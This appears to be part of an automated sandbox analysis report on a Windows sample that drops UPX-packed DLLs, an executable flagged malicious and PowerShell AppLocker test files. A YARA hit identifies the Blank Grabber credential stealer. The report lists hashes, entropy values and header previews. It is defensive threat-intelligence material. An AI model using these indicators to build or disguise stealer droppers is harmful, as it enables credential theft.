                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|g...4...4...4..4...4M..5...4M..5...4M..5...4M..5...4C..5...4...5...4...4W..4C..5...4C..5...4C..4...4C..5...4Rich...4................PE..L.....Vc...........!...!.........0.......@...@...............................P............@.........................hL..P....I.......@.......................L.. ....................................:..............................................UPX0.....0..............................UPX1.........@......................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):29560
                                                                                                                                                                                                                              Entropy (8bit):7.605780197396166
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:lrN4GP6S86vyQRq3l021XqnbcuyD7UAID5I+OYiSyvtpPxWEHdxFAy:1NbP6Shzc3l5qnouy8AID5I+O7SynPxF
                                                                                                                                                                                                                              MD5:368C589936DD438AB4BA01E699B2D057
                                                                                                                                                                                                                              SHA1:66A0A47A210279066D7D6906FC0502B6D0136AB7
                                                                                                                                                                                                                              SHA-256:35BB95A6C8DD259CCC7EE01EF2C5142D83A41C188BFC1A7D888E3B6988E8E3B7
                                                                                                                                                                                                                              SHA-512:61DF0FBD6D668D1AAE6555A0199BF6E1C28437D3A3E7BF190C4818908CBCB64D08D6D745B01A692CC2FEA6BA101521223DA2648F6438870249BD5F3EA5E549F4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y............`.....1c.....1c.....1c.....1c.....?c......`......b........2...?c.....?c.....?cl....?c.....Rich............................PE..L...F.Vc...........!...!.@..........`.....................................................@.........................H...P....................................... ...................................8...............................................UPX0....................................UPX1.....@.......:..................@....rsrc................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80248
                                                                                                                                                                                                                              Entropy (8bit):7.902906377668485
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:emtCbhoeYULPV3Ky6JmLhVPSFJSHDva77A/2A2nouy8OIDe1o77SyOPx7E:emsbhlD1xL7WSbsAuAGoutOIDe1o74xI
                                                                                                                                                                                                                              MD5:945C87E35009C0E335A5798D26A6BFF5
                                                                                                                                                                                                                              SHA1:D154E1DBE948EA34C49C598ECB1BA5046CE5701E
                                                                                                                                                                                                                              SHA-256:77E99912E32361E6AF44676C841F1DA7F028CD01886AF6173BD25A8B6C97C748
                                                                                                                                                                                                                              SHA-512:130A0028828D4509BB014BE3ADD814BC638851B8522E1B49C960689435978737B77D892F2AA35E830736F2ED0166DACE753B5422A85E14C4A75310488C28748C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".v.C.%.C.%.C.%.;.%.C.%.8.$.C.%.8.$.C.%.8.$.C.%.8.$.C.%.8.$.C.%.;.$.C.%.C.%.C.%.8.$.C.%.8.$.C.%.8n%.C.%.8.$.C.%Rich.C.%................PE..L...K.Vc...........!...!.........P...Q...`...`...............................p............@..........................k..L....i..h....`......................Pk.......................................]..............................................UPX0.....P..............................UPX1.........`......................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23936
                                                                                                                                                                                                                              Entropy (8bit):7.407072491142335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Hfff0Aj/bjIB4aNJawcudoD7UXtID7U+d9IYiSy1pCQmPPxh8E9VF0NyKvI:/fMaOnbcuyD7UdID7U+sYiSyvGPxWE0
                                                                                                                                                                                                                              MD5:F43666BF65895BFBAE75047BB1C6E3BC
                                                                                                                                                                                                                              SHA1:68BDBBC96C1E0FD742BAF12E70CB3F7BCF3C36BD
                                                                                                                                                                                                                              SHA-256:99575C81CD208C47B6CC4C61624AC65C31B91EA957B68D5C3C82A6A6C37CFA70
                                                                                                                                                                                                                              SHA-512:90BBF0749498CAEC97AD754D844F3D6430AEAC2A38E9F8A93CCC1BEA4FDC71290A1496BA68D9932588CCAD22FBF0D20A8DF2A651CA310CFAC81B632A04A0F271
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...]...]...T.H._......._.......V.......W.......\.......^......._...]...........\.......\.....$.\.......\...Rich]...................PE..L...$.Vc...........!...!.0.......p.......................................................@............................L.......(............................... ...................................................................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):38272
                                                                                                                                                                                                                              Entropy (8bit):7.689207102116093
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ImNv2PUaeQ9kX6wlhywlanbcuyD7U9IDQwuIAYiSyvBZPxWE0:Imh2P4mkTYwcnouy89IDQwuIA7SyTPx
                                                                                                                                                                                                                              MD5:C3F890E3039C68572F16DE4BC34D6CA1
                                                                                                                                                                                                                              SHA1:D6EB20EC639643A162715C3B631AE5EDBD23FAE2
                                                                                                                                                                                                                              SHA-256:BC28C36960B8028ADC4FE2CC868DF2B5C7778B4D4B0C7E15DD0B02A70AC1F5A2
                                                                                                                                                                                                                              SHA-512:AD95294E61391D245DDC4ED139D9765678BB5611F45808E3C985666B53DA56F2AFD4A46697D937ED1941D7EC64108DC4EAF39144041DC66A65626C7E9DFBA90E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................q......q.......q.......q.................C..........................................Rich...........................PE..L...E.Vc...........!...!.`...........=.......P...............................`............@.........................x[..P....Y.......P.......................[.. ...................................pI..............................................UPX0....................................UPX1.....`.......\..................@....rsrc........P.......`..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44408
                                                                                                                                                                                                                              Entropy (8bit):7.768973460184971
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:C1xB4cn2W90BXWTZ6EViVCWqL8TfaLs7vlcmnbcuyD7UVID5Qz1YiSyvsPxWE0xL:Yn2W90BmcgiVLMXLCnouy8VID5Qz17Su
                                                                                                                                                                                                                              MD5:0A68F6C9A099A00A5CE26D1A3951DDA9
                                                                                                                                                                                                                              SHA1:B03BB0DB3F5FE67450878EA141D68E77CAD5E2AA
                                                                                                                                                                                                                              SHA-256:EC9D4B312EA445806B50E00F1E4467D4923386E2220AF80AAE2A759CF633954F
                                                                                                                                                                                                                              SHA-512:AD9DBEABAE6FAE3F302CAE363B8591241ADC443F5AADE9AC950EBD8F705D4D168F6EF921BC433D45F6AC34055E83FBBBE0D51EE188605B11BDA049D4DB99FE47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C..m..i>..i>..i>...>..i>..h?..i>...>..i>..l?..i>..m?..i>..j?..i>..h?..i>L.h?..i>..h>..i>..a?..i>..i?..i>...>..i>..k?..i>Rich..i>........PE..L...M.Vc...........!...!............`.... ................................................@.........................L...P....................................... ...................................8...............................................UPX0....................................UPX1......... ...t..................@....rsrc................x..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):58240
Entropy (8bit):7.833816786281047
Encrypted:false
SSDEEP:1536:w6YriPcTDlQtYkVLQxFJaUXBfZIEnouy8lIDt7zjV7SyYpPx:1R4DqNLQrcUxfZoutlIDt7zJcx
MD5:92940DCC7B644481D182F58EC45623E7
SHA1:374DBF370EE3A4659A600545EF4E4BA2B699DFEA
SHA-256:B4D3B352A4AEF999497738A30236F9D96E56B1FC92FD268C1736F74C902315F9
SHA-512:3EE1D32FF4CAA89EA98B8DEF89B9C22B32199BB3CB0196ADD71975B260BE898138D6A97DB1FF2E7C6996DD0DDD03CBECDF32C83F381C1655BB8AD4EA8BB46569
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1439447
Entropy (8bit):5.586381782332628
Encrypted:false
SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90HtAWfh2dYMbPRMZdf9:6QRqL2xNbrp
MD5:2A138E2EE499D3BA2FC4AFAEF93B7CAA
SHA1:508C733341845E94FCE7C24B901FC683108DF2A8
SHA-256:130E506EAD01B91B60D6D56072C468AEB5457DD0F2ECD6CE17DFCBB7D51A1F8C
SHA-512:1F61A0FDA5676E8ED8D10DFEE78267F6D785F9C131F5CAF2DD984E18CA9E5866B7658AB7EDB2FFD74920A40FFEA5CD55C0419F5E9EE57A043105E729E10D820B
Malicious:false
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):126019
Entropy (8bit):7.6389884717120475
Encrypted:false
SSDEEP:3072:eswSZ9V/18peuu7tczL2uSWFOVo5awcSm4YU6V:esZipeuu52LTk6uzU6V
MD5:C903EBA8D9AF1B5C09B05971F1BCA0E0
SHA1:8953D8D13DD76AE18047C34B778631FFF6BF7FCA
SHA-256:09D5C1E3B184B77C40F80EF33972689C88982C7277395DEB0E2F1040B04AC4A5
SHA-512:03328178DD3292BDB473633805C716FE07BC2F48BA9DBDDEC649056F234B043391DDE99451C7A05671F05732F4239964DE4B65538900C50F180EFC227641B0B8
Malicious:false
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):771424
Entropy (8bit):7.88741146043164
Encrypted:false
SSDEEP:12288:HbHYv2qcP8h9bi+7kBudnb8ss83EyWqCc3fOxYFP2L9Jfvn7aGWRhTBhW2RDoS6G:TYOB8h9O+Aqbm83EyWqC3e69xTaxRhbv
MD5:F05C8BBD35947B9019EF5F1D427CB07E
SHA1:8703DF14305DC624A59808884D71E73877D509B4
SHA-256:2267F63A35FD3FF9599867A87FCB8123EA0E872A275F236A053CE8B1D13642D6
SHA-512:706058940F03E84045217CF99DF0BF2A1E3CAFD9AE61DAA79ACFFA863B5403142859C1B66901D4A4DEEBEC77B5E3C4674EFA862F01211218F377D02A0A3AA19F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):23800
Entropy (8bit):7.532310054556082
Encrypted:false
SSDEEP:384:HyUnSMis98QiY/zWj+KzzwI2XQcnRwgNhQaNJawcudoD7UiaRl/DG4y8gzhH:HybMycWjFL6xnag9nbcuyD7UhDG4yrhH
MD5:DF5514796B647481D295B14A43F5287F
SHA1:CF52BF55D81D98C46142117FB82D2A9DC7DA1B41
SHA-256:1E1F2E32114E5C20B1B804C92618318E7A1A7524162A73155E5E1653D08F7B77
SHA-512:379D4DB1952F9C3A21192E27D98FD9635B66BD928E448C8725D4D9EF479099674863055703B45AC4AEFD9AE478994B69948C87B558DB092944D1D636E146016A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):175968
Entropy (8bit):7.899661195365666
Encrypted:false
SSDEEP:3072:F1UrZUM6uNilSjCeoPZrjUTEXKmS0EhRFN0dzun8HHDu1Q06outp62yQ0:F1gt6fanWD8PRFN01H6D6oSm
MD5:F3D3487191DB4BBECC0A775CDE827CC1
SHA1:43FEF4F4DE1185D7CA4DD5E8FA018A57E87B3D31
SHA-256:22A0C62FD88787FD64845A9522747F5D960FB3B53B47272B75B96C67524EE222
SHA-512:01C957C17D0E37203294B2A7D9FB75FEE00E9C854E9B98D847BEFC5E7BCD9B6E053207FD9B41796E76E95B691324E2545300D1B8434A7DA9207998F39B5295CD
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):1437056
Entropy (8bit):7.990810874306978
Encrypted:true
SSDEEP:24576:1JQK4xZRmI5TACFlfSoER3Sgb+LwXYYUePAfU+8L8wU91B4oQn36V2QSyH:rYxZRtuCfSoS3SpLwzUePw8u91a5KVTS
MD5:0E06F85BCFB1C684469CE62E35B5C272
SHA1:73122369425C1FEC9A035975A1834139F6869279
SHA-256:6209E55CAE73AB3D7BB19A80CD4FB9981B6A3DB75BCD5036E84084B23956D9F8
SHA-512:C4077F23BF2BC1B2826AD85B4955419B4F79C1BBA144372E6706EE8E07EA252D820FDB8C43A6FDD4020FA1E468AFF287DF443A42B2FDCBD9F41D56F5BBE83B4F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation:unknown
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):630736
                                                                                                                                                                                                                              Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                              MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                              SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                              SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                              SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                                              Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                              MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                              SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                              SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                              SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23936
                                                                                                                                                                                                                              Entropy (8bit):7.328837535970089
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:u30TK+6sbPmrKjaNJawcudoD7UEID7G+SIIYiSy1pCQimEPxh8E9VF0Nybk:u3MK92WnbcuyD7UEID7G+SYiSyvUPxWy
                                                                                                                                                                                                                              MD5:1ECEA4488C6503337C5FD9D50C8FB638
                                                                                                                                                                                                                              SHA1:31C61C788DAB5DC58FF479AF7EFF758A0229253C
                                                                                                                                                                                                                              SHA-256:F20251E6571C43F4ECBBE00E72637F91605886DD76C77557EDF7979F71C07D0E
                                                                                                                                                                                                                              SHA-512:C7011D4D67CEF3E4A7B1E096DFC0633FCEDC4F287676039833C89966995B673C6FB8456E595BA49260DBC7B9BDA523256344C4814FA2F8BD10AF290861A3B8B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e..Y...Y...Y...P|U.[.......[.......R.......S.......[.......[...Y...g....|..\.......X.......X.....9.X.......X...RichY...................PE..L...'.Vc...........!...!.0.......p........................................................@............................L.......P...........................<... ...................................`...............................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):508792
                                                                                                                                                                                                                              Entropy (8bit):7.9897092823464195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:a0AG6VgjDdbKHXZqW7wQy5goaZ28b+XZgHboSvx9:alGXjpOHpqW7w1FaAmo2hD
                                                                                                                                                                                                                              MD5:FDBC1ADFDEB07195F85BF551CF03A0DE
                                                                                                                                                                                                                              SHA1:94DCF3EC50759EE92335F02FC0F3D9E60305E740
                                                                                                                                                                                                                              SHA-256:563D0BC6B5A401F2C66F67CCAA19C50084B67433EC440BB9CF0A8D81EE269C55
                                                                                                                                                                                                                              SHA-512:BD567A4C6B4627556B02F4299D1B8A9AA7AFFAE0AAFBE5A10C92C7E5A08E7F8CBDA497F27C01D1FF4352FF1DC1C2FE3C79FF9484E58E6357C96C9A064F5011EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J0...Q{Y.Q{Y.Q{Y.).Y.Q{Y.*zX.Q{Y.*~X.Q{Y.*.X.Q{Y.*xX.Q{YE)zX.Q{Y.QzY.Q{Y.*sX.Q{Y.*{X.Q{Y.*.Y.Q{Y.*yX.Q{YRich.Q{Y................PE..L...I.Vc...........!...!.p...0.......).......@...............................p............@..........................J..L"...H..L....@.......................m.. ...................................X5..............................................UPX0....................................UPX1.....p.......h..................@....rsrc....0...@.......l..............@..............................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):298368
                                                                                                                                                                                                                              Entropy (8bit):7.989961859924653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:Qi0QmEFlLL6ZSsgx3sVCp05YYwYdvdvmHw+c5qfzZoSwt:QiMEFlfsK3skpZnmdvMyA7ZoSwt
                                                                                                                                                                                                                              MD5:BB3D050B8A75F478E4B29897EAE427B0
                                                                                                                                                                                                                              SHA1:1930808A59A8FD9C57ED6039E7614697B4CB03D9
                                                                                                                                                                                                                              SHA-256:06AF11548B8A58FED50AE7DBE2FCFBBF04B890926E0FFFD70EED02AECC0D97C6
                                                                                                                                                                                                                              SHA-512:BE596E2829C6978D7F138F79059172024EE73CD3E1F3D7A24AACA4B0D85A2302E2060E6CEBD54854E7F08ED66B665429D38BB22C512DD82533D8BA87A426F515
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........i"...q...q...q..q...q...p...q...p...q...p...q...p...q...p...q...p...q...q..q...p...q...p...q...q...q...p...qRich...q........PE..L...*.Vc...........!...!.`..........@f... ................................................@.........................l...X...................................... ....................................r..............................................UPX0....................................UPX1.....`... ...T..................@....rsrc................X..............@..............................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
[Nine further dropped-file entries with identical metadata (same 60-byte AppLocker lockdown-mode test file, same process, same MD5/SHA1/SHA-256/SHA-512 and SSDEEP) are omitted here; the report prints one copy per PowerShell instance.]
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.0828533088292396
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBpYak7YnqqapNPN5Dlq5J:+RI+ycuZhN7iakSajPNnqX
MD5:2E1AC44DD09DFFFF40C62F43DE4B3CC2
SHA1:1F78026C840CBB5344A279C8307650C00FB32E3D
SHA-256:B98E34E858CBA9C234E0A36BB0B593F2A9530C36E43ED7EA98B5BB5AF7CFB6B8
SHA-512:DD9AE3EB68276EF59DC83AFFE264CC1D865BE91D42E9A5B236F431BD68CEFBEEFBB6D3DF42EAC2E163137F37086E8BFF7E54FFF18C58E6468486AE714FEC9F2E
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.i.f.u.c.m.0.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.i.f.u.c.m.0.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Reputation:unknown
